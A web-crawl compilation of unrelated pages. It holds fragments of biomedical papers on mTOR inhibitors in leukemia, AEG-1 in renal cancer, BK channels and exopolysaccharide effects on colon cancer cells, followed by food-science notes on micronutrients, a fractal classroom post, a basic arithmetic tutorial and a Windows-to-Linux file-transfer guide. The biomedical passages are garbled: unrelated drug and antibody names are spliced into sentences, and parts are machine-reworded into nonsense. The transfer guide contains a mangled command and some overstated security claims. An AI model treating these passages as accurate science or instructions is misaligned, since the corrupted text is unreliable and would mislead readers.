Oncotarget. Torin-2 alone suppressed feedback activation of PI3K/Akt, whereas the mTORC1 inhibitor RAD001 required the addition of the Akt inhibitor MK-2206 to achieve the same effect. These pharmacological strategies targeting PI3K/Akt/mTOR at different points of the signaling pathway cascade might represent a new promising therapeutic strategy for treatment of B-pre ALL patients. Keywords: B-pre acute lymphoblastic leukemia, Torin-2, mTOR, targeted therapy, Akt INTRODUCTION mTOR is a highly conserved and widely expressed serine/threonine kinase, that is a member of the phosphatidylinositol-3 kinaseClike kinase (PIKK) family, which also includes other protein kinases that regulate DNA damage responses, such as ATM (ataxia telangiectasia-mutated kinase) and ATR (ATM [ataxia telangiectasia-mutated]- and Rad3-related kinase) [1, 2]. mTOR plays a pivotal role in the PI3K/Akt/mTOR signaling pathway, which senses growth factor and serves as a central regulator of fundamental cellular processes such as cell growth/apoptosis, autophagy, translation, and metabolism [3, 4]. Activation of PI3K recruits cellular protein kinases that in turn activate downstream kinases, including the serine/threonine kinase Akt. Phosphorylation of Akt activates the mTOR complex 1 (mTORC1) and induces subsequent phosphorylation of S6K, and of the eukaryotic translation initiation factor 4E-binding protein 1 (4E-BP1). The activation of mTORC1 results in increased translation and protein synthesis . A second complex of mTOR, known as mTORC2, has been more recently described and appears to act as a feedback loop via Akt . Gene deletions/mutations and functional impairment of many proteins involved in this signaling pathway lead to a deregulation that results in different human cancers, including hematological malignancies. Furthermore hyperactivation of this pathway through loss of negative regulators, such as PTEN, or mutational activation of receptor tyrosine kinases upstream of phosphoinositide 3-kinase (PI3K) is a frequent occurrence in leukemia patients, where it negatively influences response to therapeutic treatments . Acute lymphoblastic leukemia (ALL) is the most common pediatric malignancy and B-precursor acute lymphoblastic leukemia (B-pre ALL) is the most frequent pediatric ALL subtype, characterized by an Arctiin aggressive neoplastic disorder of early lymphoid precursor cells [8, 9]. The treatment protocol for B-pre ALL includes an intense chemotherapy regimen with cure rates of 15C80% [10, 11]. In B-pre ALL many research efforts are currently devoted to the development of targeted therapies to limit side effects of chemotherapy and to increase treatment efficacy for poor prognosis patients, i.e. poor outcome following relapse [12, 13]. PI3K/Akt/mTOR pathway activation is a frequent feature in B-pre ALL and therefore this pathway is an attractive target to efficiently treat this disease. A new class of ATP-competitive mTOR inhibitors, such as Torin-2, have been shown to potently target mTORC1 and mTORC2 . Torin-2 is also a potent inhibitor of ATR, ATM, and DNA-PK. This compound Mouse monoclonal to EhpB1 exhibits an anti-tumour activity more broad-based and profound compared to Arctiin the rapalogs that do not fully inhibit mTORC1 and are unable to inhibit mTORC2 . We therefore hypothesized that dual inhibition of mTORC1 and mTORC2 by Torin-2 would provide a superior outcome in B-pre ALL as compared to inhibition of mTORC1 obtained with RAD001 . We tested the cytotoxic activity of Torin-2 and its capability to prevent Akt reactivation after mTORC1 and mTORC2 inhibition. Furthermore we explored if dual targeting of mTORC1 and Akt, with RAD001 and MK-2206 respectively, might achieve results similar to those obtained with Torin-2 alone. Torin-2 displayed a powerful cytotoxic activity with an IC50 in the nanomolar range, induced G0/G1 phase cell cycle arrest, modulated the PI3K/Akt/mTOR pathway and caused apoptosis and autophagy in a dose-dependent manner. Interestingly, feedback activation of PI3K/Akt was suppressed by Torin-2 alone, whereas RAD001 required the addition of MK-2206 to achieve the same efficacy. These findings indicates that mTORC1 and mTORC2 inhibition could be an attractive strategy to develop innovative therapeutic protocols for the Arctiin treatment of B-pre ALL leukemia patients and to prevent Akt reactivation after mTORC1 targeting. RESULTS PI3K/Akt/mTOR.
As shown in Figure 1B, the level of AEG-1 was distinctly higher in ccRCC tissues than that in the surrounding normal tissues. underlying mechanism by which AEG-1 facilitates the metastasis of ccRCC cells have not yet been explored. In this study we demonstrated that AEG-1 plays vital roles in growth and metastasis Cytochalasin H of ccRCC Caki-2 cells and normal tissue showed that AEG-1 was significantly overexpressed in the Jones Renal ccRCC dataset and Gumz Renal ccRCC dataset . Cells proliferation and colony formation assay Cell proliferation was detected by MTS assay ITGA9 (Promega, Madison, WI, USA). First, Caki-2 cells were cultured into 96-well plates. After incubation for 1 day, 2 days, 3 days, or 4 days, 20 l of MTS solution was added into 96-well plates and the cells were incubated for 4 h. Finally, the absorbance value was assessed at 490 nm. In colony formation analysis, cells (1000) were seeded into 6-well plates. After being cultured for a total of 3 weeks, cell colonies were stained using crystal violet (0.1%) and counted . Plasmids and transfections Short hairpin small interfering RNA (shRNA) specifically targeting AEG-1 was purchased from Santa Cruz (Santa Cruz, CA, USA). AEG-1 expression construct was produced by sub-cloning PCR-amplified full-length human AEG-1 cDNA into pMSCV retrovirus plasmid. The pCLEN-Notch1 plasmid (#17704, Addgene, Cambridge, MA, USA) was deposited by Dr. Nicholas Gaiano. Transfection of shRNA or plasmid was conducted using Lipofectamine 2000 (Invitrogen, Carlsbad, CA, USA). Immunoblotting Total proteins were extracted using lysis buffer. We resolved 25 g proteins by 8% SDS-PAGE and transferred them to a PVDF membrane (Millipore, USA). After blocking with blocking buffer, PVDF membranes were incubated with primary antibodies. After washing with TBST, PVDF membranes were incubated with horseradish peroxidase (HRP) secondary antibody. Signals were assessed using the ECL system (Millipore, Braunschweig, Germany). Wound-healing and invasion assay Cells were cultured in 6-well plates to form a confluent monolayer. A wound was scratched using a 100-l pipette tip. The gap was photographed at 0 h and 24 h . The invasion of Caki-2 cells was detected using a Cytochalasin H BioCoat? Matrigel-coated Invasion Chamber (8.0-m membrane, BD Biosciences, USA). We placed 1105 Caki-2 cells into the upper chamber and 600 l DMEM containing 25% serum was added to the lower chamber as a chemo-attractant. After 6 h, the invaded Caki-2 cells in the lower surface of the membrane were stained with crystal violet (0.1%) and were counted in 5 randomly selected fields . Immunofluorescence Cells on a glass coverslip were permeabilized using Triton X-100 and then incubated with 1% BSA in PBS to block nonspecific binding. Then, Caki-2 cells were incubated with rabbit anti-AEG-1 antibody. The cells were washed with PBS 3 times and then were incubated with goat anti-rabbit FITC Cytochalasin H secondary antibody (1: 100, Boster Biological Technology, Wuhan, China). Cell nuclei were stained using DAPI (Boster Biological Technology). Experimental pulmonary metastasis model The BALB/c nude mice were bought from Shanghai Slack Laboratory Animal Co., LTD (Shanghai, China). The parental Caki-2 cells, AEG-1 OE, or Caki-2 Cytochalasin H transfected with AEG-1 shRNA plasmids Cytochalasin H were injected into nude mice via the tail vein. All nude mice were sacrificed after 4 weeks and lung tissue was fixed using 10% formalin and subjected to hematoxylin and eosin (H&E) staining. Quantitative real-time PCR (qRT-PCR) RNA was extracted using the RNEasy kit (Qiagen). We performed qRT-PCR using 1 g RNA with the QuantiTect Reverse Transcription kit (Qiagen). The primers were as follows: GAPDH: Forward: 5-TGGATTTGGACGCATTGGTC-3, Reverse: 5-TTTGCACTGGTACGTGTTGAT-3; AEG-1: Forward: 5-AAATGGG CGGACTGTTGAAGT-3, Reverse: 5-CTGTTTTGCACTGCTTTAGCAT-3; Notch1: Forward: 5-CCCTTGCTCTGCCTAACGC-3, Reverse: 5-GGAGTCCTGGCATCGTTGG-3. The comparative cycle threshold (Ct) method was used to quantify the levels calculated using the 2 2(?Ct) method. Xenografts The nude mice were assigned to the following 2 groups: AEG-1 shRNA and shCon (control group). Then, 100 l of Caki-2 (AEG-1shRNA/control-shRNA) cell suspension containing 1106 cells was subcutaneously inoculated into nude mice. The tumor sizes were measured once a week. Five weeks later, the mice were sacrificed and the tumors were removed for further IHC staining. Experimental protocols involving animals were approved by the Institutional Animal Care and Use Committee of the First Peoples Hospital of Jining City in Shandong Province. Statistical analysis The data are presented as mean standard deviation.
The symbol > was assigned in case of a drug showing a major absolute value but not statistically significant, while the symbol > was assigned when the calculated values were statistically significant in respect to those calculated for other drugs. The % change of the cell viability induced by the external K+ ions challenge (hyper-K or hypo-K) was calculated in respect to the normokalemia conditions; in the presence of BK channel blockers, it was calculated in respect to the control conditions (absence of blockers) using the following equations: % change of the cell viability = (Hyper-K or Hypo-K / Normo-K) x 100; % change of the cell viability = ((Normo-K+ Blockers) / Normo-K) x ELTD1 100. The effects of the BK channel openers on the cell viability were evaluated vs the changes of this parameter induced by IbTX under normokalemia conditions (Normo-K + IbTX), hyperkalemia (Hyper-K) or hypokalemia (Hypo-K) conditions using the following equations: % change of the cell viability = ((Normo-K + IbTX) + Openers) / (Normo-K + IbTX) x 100; % change of the cell viability = ((Hyper-K or Hypo-K) + Openers) / (Hyper-K or Hypo-K) x 100. Acknowledgments The Dr. cell viability in hslo-HEK293. BK openers prevented the enhancement of the cell viability CGS-15943 induced by hyperkalemia or IbTx in hslo-HEK293 showing an efficacy which was comparable with that observed as BK openers. BK channel modulators failed to affect cell currents and viability under hyperkalemia conditions in the absence of hslo subunit. In contrast, under hypokalemia cell viability was reduced by -22+4% and -23+6% in hslo-HEK293 and HEK293 cells, respectively; the BK channel modulators failed to affect this parameter in these cells. In conclusion, CGS-15943 BK channel regulates cell viability under hyperkalemia but not hypokalemia conditions. BFT and ACTZ were the most potent drugs either in activating the BK current and in preventing the cell proliferation induced by hyperkalemia. These findings may have relevance in disorders associated with abnormal K+ ion homeostasis including periodic paralysis and myotonia. Introduction Potassium ions regulate inflammation, oxidative stress, vascular biology and blood pressure, the excitability of the cells, exerting beneficial effects on different tissues [1C3]. Abnormalities in the serum potassium ion levels are associated with acquired and congenital diseases affecting several apparatus including skeletal muscle . Severe hyperkalemia characterizes the hyperkalemic renal tubular Acidosis (type IV), mineralocorticoid deficiency (hypoaldosteronism states) as well as tumor lysis syndrome, rhabdomyolysis, marked leucocytosis and thrombocytosis, trauma and burns . Disease progression and increased hearth mortality are observed in chronic kidney disease under hypokalemia or hyperkalemia conditions and these effects are gender and race dependent . Severe nephropathy with renal interstitial fibrosis and ventricular hypertrophy are seen in human patients under hyperkalemia states [7,8]. Marked variations in serum potassium concentration characterize the primary periodic paralyses (PP) which are rare autosomal-dominant disorders affecting neuromuscular apparatus characterized by episodes of muscle weakness and paralysis. The primary PP is hyperkalemic periodic paralysis, hypokalemic periodic paralysis and Andersens syndrome . Other related disorders are the thyrotoxic periodic paralysis associated with thyrotoxicosis. The familial periodic paralysis and thyrotoxic periodic paralysis are linked to mutations in the skeletal muscle sodium, calcium or potassium channel genes associated with muscle fiber depolarization and un-excitability [9C12]. Besides the short-term arrhythmogenic effects of hypo- and hyperkalemia, abnormalities of potassium ion homeostasis have a clear negative impact on clinical outcomes in neuromuscular disorders but the pathomechanisms associated with hyperkalemia or hypokalemia conditions are not well understood . Vacuole myopathy and t-tubule aggregates characterize muscle biopsies of hypoPP patients and K-depleted rats, a not genetic animal model of the disease [9,14]. Progressive muscular atrophy and permanent weakness were found in hypoPP patients carrying the CACNA1S gene mutations . In Andersens Syndrome, the loss of function mutations of KCNJ2 gene encoding for the Kir2.1 is associated with arrhythmias, muscle weakness and skeletal muscle CGS-15943 dysmorphisms as demonstrated in the Kir2.1 knockout mice, which exhibits a narrow maxilla and complete cleft of the secondary palate that may mimic the facial dysmorphology, observed in humans [9,16]. In this case, the loss of function mutation of the Kir2.1 channel is associated with an abnormal cell proliferation that reduces the cell viability explaining the dysmorphology characterizing the phenotype [16,17]. The Kir2.1 channel is indeed active in differentiating cells inducing hyperpolarisation and setting the -60 mV (Vm)and are slope factors from the concentrationCresponse romantic relationships. The capability from the medications to maximally activate the hslo route was improved by patch depolarization (Amount 4A). The overall efficacy ranking from the openers predicated on the evaluation of variance at +30 mV (Vm) was BFT> NS1619> ACTZ>DCP>ETX>RESV>QUERC> MTZ that was different according to that noticed at -60 mV(Vm). The strength ranking from the openers portrayed as EC50a at the same voltage membrane was BFT> ACTZ>DCP>ETX >RESV> NS1619>QUERC>MTZ that was similar compared to that noticed at -60 mV(Vm) (Desk 1). HCT had not been effective as opener from the hslo route currents in the number of concentrations examined at detrimental or positive membrane potentials. The Hill.
Cell line HT\29, a human colonic cancer cell range, was supplied by the Tumor Institute from the Chinese language Academy of Medical Technology. oxidative tension was inhibited, as well as the manifestation of GRP78 and CHOP FCGR3A was reduced considerably, indicating that oxidative pressure make a difference the ERS pathway. Furthermore, it recommended that the event of apoptosis was connected with Bcl\2 gene family members. To conclude, this study proven that M5\EPSs can induce HT\29 cells apoptosis by destroying the redox program through activation from the ERS signaling pathway. subsp. paracasei M5L (M5\EPSs) induced apoptosis in HT\29 cancer of the colon cells connected with rules of Bcl\2 gene family members; remedies with M5\EPSs led to upregulation of ROS downregulation and degrees of antioxidant enzyme actions, resulting in an imbalance in the oxidation program in HT\29 cells; endogenous ER tension (ERS) was involved with HT\29 cells apoptosis; and M5\EPSs induced HT\29 cells’ apoptosis by destroying the redox program through activation from the ERS signaling pathway. 1.?Intro Colorectal tumor, the 3rd most malignant tumor occurring across the global globe, is regarded as influenced by many elements, making this type of cancer a significant wellness concern (Bray et?al.,?2018). Despite Regular or complementary therapies, including chemotherapy, rays, surgery, physical treatment, and immunotherapy have already been attempted Acebilustat to deal with colorectal tumor, an effective treatment hasn’t yet been discovered, and medical resection is often useful for colorectal tumor treatment (Adam et?al.; Delaunoit et?al.,?2005; Zampino et?al.,?2016). Nevertheless, the drug level of resistance of tumor cells has clogged their apoptosis; furthermore, anticancer real estate agents may have cytotoxic effects in normal cells (Alfarouk et?al.,?2015;?Lichan Chen,?2018; Sun et?al.,?2012). In recent years, an increasing number of natural products with anticancer compounds have had their pharmacological bioactivities confirmed and have been used to explain the mechanisms of cancer prevention in apoptosis. The endoplasmic reticulum activates the unfolded protein response (UPR) when it undergoes stress. This response can protect cells from the damage caused by Acebilustat the endoplasmic reticulum stress (ERS) and restore cell function; however, when ERS is too strong or lasts too long, Acebilustat the endoplasmic reticulum homeostasis is seriously unbalanced and cannot be repaired, which will lead to cell apoptosis. The UPR normally activates three transcription factors, including inositol\requiring enzyme 1 (IRE1), PEK\like endoplasmic reticulum kinase (RERK/PEK), and activating transcription factor 6 (ATF6), which degrade deposited unfolded and misfolded proteins of these three transcription factors, ATF6, as a receptor protein in the endoplasmic reticulum, is one of the factors in the apoptosis and autophagy pathways induced by the ERS (Haque et?al.,?2015). ERS\induced death signaling pathways include the CHOP/GADDl53, JNK, and caspase pathways (Wang et?al.,?2014). Cells enhance ATF4 through the PERK pathway, and CHOP is also a transcription factor of the PERK pathway and the direct target of ATF4. CHOP and caspase expression are weak when homeostasis is balanced. When ERS occurs, CHOP and caspase expression will significantly increase. Overexpression of CHOP and caspase can Acebilustat promote cell cycle stagnation or lead to apoptosis (Liu et?al.,?2015). Another pathway that causes cell apoptosis is the oxidative stress pathway (Xiang et?al.,?2015). Including cancer, inflammation, diabetes, Parkinson’s disease, Alzheimer’s disease, atherosclerosis, and aging, various disorders and diseases have been considered to be related with massive production of reactive oxygen species (ROS) and oxygen\derived free radicals. Besides, dysfunction of cells, cell cycle arrest, and apoptosis. | <urn:uuid:25029a5c-51db-47e3-bd77-e2efb117119f> | CC-MAIN-2023-14 | http://careersfromscience.org/category/dopaminergic-related/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950363.89/warc/CC-MAIN-20230401221921-20230402011921-00005.warc.gz | en | 0.919925 | 14,024 | 2.625 | 3 |
Micronutrients and Calories¶
Minerals and Trace Elements¶
Within the category of micronutrients we can classify things further into:
- Minerals - are elemental nutritional components that we require in quantities of \(>100\:mg/day\)
- These are either structural elements or large components of biochemical processing
- e.g. Na, K, Ca, Mg, Cl, P, S
- Trace elements - elemental nutritional components that we require in quantities \(<100\:mg/day\)
- These are typically required for hormonal and metabolic function and are quite often, involved in enzymatic processes
- e.g. Fe, I, F, Zn, Se, Cu, Mn, Cr, Mo, Co, Ni
Their deficiency leads to very specific symptoms:
|Trace Element||Deficiency Symptom|
|Fe||Unusual tiredness, paleness, brittle nails|
|I||Swollen neck, unexpected weight gain, weakness, hair loss, heavy or irregular periods|
|Zn||Wounds that won’t heal, open sores on the skin, lack of alertness|
|Se||Muscle weakness, mental fog, weakened immune system|
|Cu||Weakness, difficulties walking, vision loss|
|Mn||Skeletal defects, slow or impaired growth, abnormal metabolism of carbohydrate and fat|
|Cr||Inhibition of protein synthesis, impaired insulin function, elevated cholesterol levels, anxiety and fatigue|
|Mo||Developmental delays, visual alterations and neurological changes|
|Co||Numbness, fatigue and tingling sensations in hand and feet|
|Ni||Changes in skin colour, hair becomes coarser|
Detection and Quantification - Minerals and Trace Elements¶
There are two primary methods used for the determination/quantification of elemental micronutrients, these typically involve ICP-EOS, which is a type of Atomic Excitation Spectroscopy (AES) and through the process of ashing.
This is the process of heating the sample to high temperatures (\(500-600^\circ C\)) to drive off moisture and oxidise the elements for quantification. A benefit is that there is no need for the use of blanks, however more volatile elements such as Hg and Ni may be lost. There may also be chemical interaction between the oxides formed and the crucible that’s used for the ashing.
Rather than heat being using to oxidise the samples, they are chemically oxidised using acids, peroxides, etc. Since there is no volatilisation, there is no loss through this method, however it requires more attention and is harder to automate.
It is possible to accelerate both methods with the addition of microwave reactors.
|Name||Structure||Food Source||Function||RDI (daily)|
|Liver, butter, egg yolk, carrots, spinach, sweet potatoes||Vision, healing eye and skin injuries||\(800-1500\:\mu g\)|
|Salmon, sardines, cod liver oil, cheese, milk, eggs||Promotes calcium and phosphate absorption and mobilisation||\(5-10\:\mu g\) (and sunlight)|
|Vegetable oils, nuts, potato chips, spinach||Antioxidant||\(8-10\:mg\)|
|Spinach, potatoes, cauliflower, beef liver||Blood clotting||\(65-80\:\mu g\)|
|Name||Structure||Food Source||Function||RDI (daily)|
|Beans, soybeans, cereals, ham, liver||Coenzyme (oxidative decarboxylation)||\(1.1\:mg\)|
|Kidney, liver, yeast, almonds, mushrooms, beans||Coenzyme of oxidative processes||\(1.4\:mg\)|
|Chickpeas, lentils, prunes, peaches, avocados, figs, fish, meat, mushrooms, peanuts, bread, rice, beans, berries||Coenzyme of oxidative processes||\(15-18\:mg\)|
|Peanuts, buckwheat, soybeans, broccoli, lima beans, liver, kidney, brain, heart||Part of CoA; fat and carbohydrate metabolism||\(4-7\:mg\)|
|Meat, fish, nuts, oats, wheat germ, potato chips||Coenzyme in transamination; heme synthesis||\(1.6-2.2\:mg\)|
|Liver, kidney, eggs, spinach, beets, orange juice, avocados, rockmellon||Coenzyme in methylation and DNA synthesis||\(400\:\mu g\)|
|Oysters, salmon, liver, kidney||Part of methyl removing enzyme in folate metabolism||\(1-3\:\mu g\)|
|Yeast, liver, kidney, nuts, egg yolk||Synthesis of fatty acids||\(30-100\:\mu g\)|
|Citrus fruit, berries, broccoli, cabbage, capsicum, tomato||Hydroxylation of collagen; wound healing; bond formation; antioxidant||\(60\:mg\)|
Detection and Quantification - Vitamins¶
Due to the variety and size of vitamins, the simplest and most effective way to identify them is to use HPLC.
Reverse Phase HPLC can be used for fat soluble vitamins and regular phase of water soluble ones. A strong solvent gradient can be used to separate out a combination of both, such as from a multivitamin
Can be measured using a calorimeter, though the amount of energy released form burning will not be indicative of how much is available through digestion, so tables tend to be used instead, though these are rough values and the specific calorific content will be dependent on the food product.
Metabolisable Energy (ME)¶
Is the amount of “food energy available for heat production and body gains”. These are based on the Atwater Factors, though they may not be truly indicative of all foods. This metric aims to consider only the nutritional value that can be actively utilise by the body to produce ATP.
The Atwater General Factor System¶
Is based on the heats of combustion of the macronutrients and corrects for losses i digestion, absorption and urinary excretion of urea.
The Extensive General Factor System¶
Is based on the Atwater system, however it makes a few modifications and refinements, such as accounting for dietary fibre separately from bulk carbohydrates
The Atwater Specific Factor System¶
Takes the system one step further by considering the food that these bulk nutrients come from
|Food Product||Protein Factor (\(kcal/g\))||Fat Factor (\(kcal/g\))||Carbohydrate Factor (\(kcal/g\))|
|Meat, fish, poultry||4.27||9.02|
|Legumes and nuts||3.47||8.37||4.07| | <urn:uuid:9104c770-1036-47e6-883d-276c0dadb9e9> | CC-MAIN-2023-14 | https://adreasnow.com/Undergrad/Notes/Sem%206.%20Food%20Science/06b/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945473.69/warc/CC-MAIN-20230326142035-20230326172035-00405.warc.gz | en | 0.793098 | 1,877 | 2.9375 | 3 |
Today in class, we learned about fractals. To help students understand the concept better, we made our own Menger sponge (see photos below). I had each student make a single cube. Then we combined 20 of them to create the 1st iteration. To make the 2nd iteration, we would need 400 of the cubes, so we were not able to go further. Students learned that the surface area of the sponge approaches $latex \infty$ and the volume approaches zero. This led to a discussion of the concept of limit (often first introduced in a precalculus or calculus course). | <urn:uuid:6b5c065b-1b2c-418d-96a2-761c82a3fe5e> | CC-MAIN-2023-14 | https://gifted-studies.com/magically-miraculous-math-day-3/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944996.49/warc/CC-MAIN-20230323034459-20230323064459-00206.warc.gz | en | 0.958375 | 122 | 3.03125 | 3 |
Hey guys! Today, we are going to take a look at the mathematical operations: addition, subtraction, multiplication, and division. These four operations serve as the fundamental building blocks for all math, so it is crucial to have a solid understanding to build upon. Let’s dive in.
Addition and Subtraction
We use addition and subtraction to solve many real-world situations. Addition and subtraction are simply the mathematical terms used to describe “combining” and “taking away.” When we add, we are combining, or increasing. When we subtract, we are taking away, or decreasing.
As a reminder:
- The symbol we use for addition is \(+\)
- The answer to an addition problem is called the sum
- The symbol we use for subtraction is \(–\)
- The answer to a subtraction problem is called the difference
Essentially, addition and subtraction are opposite operations. One adds value, and the other deducts value. One strategy for visualizing these two operations is to use a number line. We will use a number line to illustrate the following examples.
Let’s imagine a situation that involves the sale of popcorn. For this scenario, let’s assume that you are trying to raise money by selling bags of popcorn, and you start with 20 bags.
When your first customer arrives, they wish to purchase 4 bags of popcorn. This means that your remaining number of bags will decrease. We can represent this situation with a simple equation that involves subtraction. We started with 20 bags, and we “decreased by 4,” or subtracted 4. Our subtraction equation is written as \(20-4=16\).
On a number line, we can represent this deduction by starting at 20 and then moving backward four units in the negative direction. Each jump backward represents subtraction by 1.
Now, let’s say you started with 20 bags of popcorn and ended up with 6 bags left at the end of the day. You need to replenish your stock in order to keep up your sales, so you make 4 more bags of popcorn. How many bags of popcorn do you now have available to sell? For this scenario, since we are looking at an increase of bags, we will use addition.
This situation can be described using the equation \(6+4=10\). You had 6 bags initially, and then “combined” that amount with 4 more bags. Now you have 10 bags in all. On a number line, addition is represented by jumps to the right, in the positive direction. Each jump to the right represents the addition of one unit. So in this example we would be starting at 6, and jumping 4 units to the right. We can see that we land on 10.
It is important to notice that when using addition, the order of the values does not matter. For example, \(10+30\) is the same as \(30+10\). The placement, or arrangement of the values has no effect on the outcome. Both arrangements would equal 40. However, the same is not true for subtraction. Does \(30-10\) mean the same thing as \(10-30\)? Clearly not. We can see that the order matters when dealing with a situation involving subtraction. The technical term for this quality is known as the commutative property. Essentially, this property is true for operations where the values can move around, “commute”, and the outcome of the expression or equation will not change. The commutative property applies to addition, but not to subtraction.
Multiplication and Division
Another operation that also shares the commutative property is multiplication. Let’s discuss multiplication together with division, as we did for addition and subtraction. Multiplication and division are similar to addition and subtraction in that they perform opposite functions. The function of multiplication is to represent multiple groups of a certain value, whereas division is designed to show the separating or subdividing of a value into smaller groups.
As a reminder:
- The symbol we use for multiplication is \(\times\)
- The answer to a multiplication problem is called the product
- The symbol we use for division is \(\div\)
- The answer to a division problem is called the quotient
Multiplication is essentially a convenient and time-efficient way to show what’s called “repeated addition.” For example, if you need to fill 30 bags of popcorn, and each bag requires 60 kernels, it could take hours to count up how many kernels you need in total by just using addition. A faster and more efficient way to make this calculation would be to use repeated addition. Instead of counting each seed independently, we would group them up, and add the groups together. The calculation would then become 30 groups of 60. This grouping, for the purpose of repeated addition, is the multiplication process at its core. 30 groups of 60 is written as \(30\times 60=1,800\). So 1,800 kernels are required to fill up 30 bags of popcorn.
Both addition and multiplication are commutative, because the order does not affect the answer. 30 groups of 60 gets us the same result as 60 groups of 30.
\((30\times 60)=(60\times 30)\)
Our last operation, division, can be considered multiplication’s opposite. When we use division, we are essentially splitting up a large group into smaller subgroups. For our popcorn example, we can use division to answer the following question:
How many bags of popcorn can I make using 1,800 kernels if each bag requires 60 seeds?
This situation requires us to divide the large value 1,800 into groups of 60. Each smaller subgroup will now represent a bag of popcorn. 1,800 divided into groups of 60 is represented as \(1,800\div 60\). In this case, the answer is 30, so 30 bags of popcorn can be made with our 1,800 kernels. As you can see, division is not commutative because the order of the values plays a crucial role in determining the answer. \(1,800\div 60\) is not the same thing as \(60\div 1,800\).
Okay, that’s all for this review of the mathematical operations! Thanks for watching, and happy studying!
The answer to a subtraction problem is called the …
A is the correct answer. Since subtraction is the difference between a smaller number and a larger number, the answer to a subtraction problem is called the difference.
Which statement is true?
Subtraction and multiplication are opposite operations.
Subtraction and division are opposite operations.
Multiplication and addition are opposite operations.
Multiplication and division are opposite operations.
D is the correct answer. Division splits a large group into smaller subgroups and multiplication is repeated addition of smaller subgroups to find the total in the large group. Therefore, these operations perform opposite functions.
Jamie rents a bicycle for $8 per hour. He has the bicycle for 4 hours altogether. Which equation can be used to find out how much money Jamie spends to rent the bicycle?
C is the correct answer. Since Jamie spends $8 for every hour he has the bicycle, he is spending $8 + $8 + $8 + $8, which is equal to $8 ✕ 4, or 32 dollars.
Which statement best illustrates the commutative property?
B is the correct answer. The commutative property states that the numbers in a math problem can be moved or swapped and the outcome of the equation will not change. The commutative property applies to addition and multiplication but does not work for division or subtraction.
At Mike’s Deli, the price for deli turkey is $4 per pound. Kate is buying turkey to make sandwiches for a luncheon. If Kate spends $80, which equation represents how many pounds of turkey she bought?
C is the correct answer. Kate knows that the total amount spent was $80. She also knows that each pound cost her $4. Kate needs to know how many equal groups $80 is split into if there is $4 in each group. To solve this problem, Kate needs to divide. Since 80 is the number that is being split up, it comes first in the division problem. B is incorrect because \(4÷80\) is not the same as \(80÷4\). | <urn:uuid:d4b13398-19b2-446a-afe7-70e64b1692c9> | CC-MAIN-2023-14 | https://www.mometrix.com/academy/addition-subtraction-multiplication-and-division/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945144.17/warc/CC-MAIN-20230323100829-20230323130829-00606.warc.gz | en | 0.948212 | 1,789 | 4.5625 | 5 |
Most home users have a dual-boot system that can boot from Linux, such as Ubuntu, or startup with Windows. This scenario, by far, is the easiest method to transfer files from Windows to Linux. However, others (business or personal) have Linux on another computer or laptop and need to copy files to that Linux system, which is a little more complex.
Although copying files from one program to another is relatively straightforward, you still need to learn how to do it properly. Keep reading to learn how to transfer files from Windows to Linux.
Five Ways to Transfer Files from Windows to Linux
Moving your files from one operating system to another means choosing the best option based on your current situation. Here are five methods you can choose from.
- Use a Linux File Browser like Nautilus to copy files on PCs with both operating systems.
- Use the Linux virtual machine on a Windows PC to copy files.
- Use an external network communication service (SSH or Secure Shell) for two networked PCs.
- Use a File Transfer Protocol (FTP) for internet transfers to a remote PC.
- Use sync software for copying to a remote or locally networked Linux PC.
Find out the details for each method in the sections below.
Copy Data from a Windows PC to Linux Using Nautilus
The easiest, most straightforward method to copy data from Windows to Linux involves using a Linux file browser like Nautilus. You can’t use Windows Explorer or any other Windows file browser because the OS cannot read Linux partitions, but Linux can read Windows partitions.
Here’s how to use Nautilus in Ubuntu to copy/paste files from Windows partitions.
- Launch the “Nautilus” file browser.
- Browse the Windows partitions for the files you want to copy to Linux (Ubuntu in this example).
- Select the files, right-click, and choose “Copy.”
- Navigate to the desired location in Ubuntu.
- Right-click and choose “Paste.”
As you can see above, the process is simple for PCs with both operating systems.
Note: Permissions can affect what files are copyable from Windows. Since the OS is offline, you can change permissions temporarily using Linux, but do so at your own risk. However, most personal files are found in accessible folders and locations.
Copy Data From a Windows PC to Linux With a Linux Virtual Machine
Using a virtual machine to run Linux in Windows is a clever way to copy your files. It is more complex than using Nautilus in Linux yet easier than other configurations. This allows you to run the other system in an app window and use it as a different computer.
To combine your two systems into one PC, you will need the help of additional software. One of the most common ones is Oracle VM VirtualBox. This platform allows users to work with several operating systems within one device.
How to Set Up the VirtualBox Platform on Windows
- Install the VirtualBox Guest Additions platform.
- Choose “Headless Start” after clicking on “Start” (the green arrow icon).
- Find the “Shared Folders” in the “Settings.”
- Select the “Machine Folders” option.
- Add a shared folder by clicking the “+” symbol in the window’s top right corner.
- Choose the “Folder Path” from the directory and name.
- Ensure that the shared folder is available when you run the VM. To achieve this, check the “Auto-mount” box before confirming your choices.
- Click the “OK” button.
- Reboot your “Virtual Machine” system, and the setup will be ready for action.
You can copy your files between the host PC (Windows) and the virtual guest system (Linux) or vice versa.
Copy Data From a Windows PC to Linux Using SSH
Secure Shell (SSH) is a specific network protocol that offers users safe access to a different device. Therefore, your first step with this method is to enable SSH on your Linux PC. Once you do this, you can copy your files through the command line from Windows to Linux.
How to Set Up an SSH Server on Linux
- You will need to open a terminal and update your operating system.
- Install the SSH server through the OpenSSH server. This server allows you to eliminate all potential threats to your data.
- While waiting for the SSH server to finish the installation, you can ensure that the OpenSSH server runs appropriately using the Sudo service SSH status.
- Install an SSH client such as PuTTY. This entirely free file transfer application is used between different networks, but it can’t function without the PuTTY Secure Copy Client (PSCP) tool.
- Download and save the pcp.exe file on your Windows C:\ drive.
- Copy your files from Windows to Linux with the following code (adjust to your needs):
c:\pscp c: ome\path\to\a\file.txt [email protected]:\home\user
Note: You must input your Linux computer password before the file transfer begins.
Copy Data From a Windows PC to Linux With FTP
File Transfer Protocol (FTP) is another excellent way to copy your data from Windows to Linux. Many may find this method more manageable since you do not need to type commands. Check your Linux server and ensure it is running. Also, you’ll need an app such as FileZilla to transfer with FTP.
- Run the “FileZilla” application in Windows.
- Open the “Site Manager.”
- Create a “New Site.”
- Change to the “SFTP” protocol.
- Input the target IP address into the “Host” section.
- Add your username and password for the host.
- Switch to “Normal” for the “Logon” type.
- Press “Connect.”
After following the above steps, you can use the FTP application to move your files from one server to another.
Copy Data From a Windows PC to Linux With Sync Software
